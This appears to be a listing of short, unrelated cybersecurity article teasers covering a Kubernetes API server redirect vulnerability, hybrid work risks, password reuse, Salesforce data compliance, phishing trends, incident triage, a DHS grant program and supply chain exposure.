A new vulnerability was reported on Sep 16th in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. As a result, the client may perform unexpected actions and share the API server credentials with third parties. The aggregated API server extension in Kubernetes API server enables users to extend API server with alternative objects and paths.

Don't bring your personal life into the office; don't bring your work stuff home — these were already difficult tasks prior to the 2020 pandemic. Now, with hybrid work settling in, they have become nearly impossible to achieve. Where we work is no longer tethered to a static location. From the Wi-Fi we connect to, to the devices we use for work, our personal and professional lives are now closely intertwined.

Imagine a burglar. They’ve spent large amounts of time researching their target — your house. They’ve perfected their infiltration techniques, found your weak points, learned your schedule, and know the best time to strike. They’ve shown up when you least expect it and jimmied open the lock on the back door. And now, rather than head inside and steal your valuables, they hold the door open for someone else.

By design, Salesforce is an environment where customer PII and other sensitive information must be shared and stored. However, compliance regulations like PCI DSS, HIPAA, GDPR, CCPA, and others limit this storage and usage of customer data to only what’s justifiably required for an organization to carry out its duties. Even then, there are requirements for how this data should be stored – like whether it should be encrypted, for example.

Password reuse is a common practice amongst teams that can lead to a cybercriminal getting a hold of your online credentials. Despite knowing that it can leave your accounts compromised, a majority of people are still guilty of reusing their passwords. Results from an online security survey by Google and Harrison Poll found that: As cybercriminals use more sophisticated attacks, organizations must emphasize the importance of good cyber hygiene practices to prevent data breaches.

In today’s online landscape, it is crucial for organizations to stay on top of the threats that put their enterprises at risk. Agari and PhishLabs have put together their Quarterly Threat Trends & Intelligence Report detailing their analysis of phishing and social media attacks this quarter. The report presents statistics regarding the volume of attacks, the tactics used by cybercriminals, and the main targets of these attacks, documenting the changes since last quarter.

In cybersecurity, triage is a cyber incident response approach to identifying, prioritizing, and resolving cybersecurity attacks, threats, and damages within a network. When simultaneous and multiple attacks occur, an IT security team must prioritize which system or device to assess in order to mitigate, remediate, and salvage important devices and data from further damage.

The Department of Homeland Security (DHS) on September 16, 2022 announced a first-of-its-kind cybersecurity grant program specifically for state, local, and territorial (SLT) governments across the country with funding in the amount of $200 million for Fiscal Year (FY) 2022, $400 million for FY 2023, $300 million for FY 2024, and $100 million for FY 2025.

The vulnerabilities perforating the global supply chain have remained dormant for many years. But the violent disruptions of the pandemic finally pushed these risks to the surface, revealing the detrimental impacts of their exploitation to the world.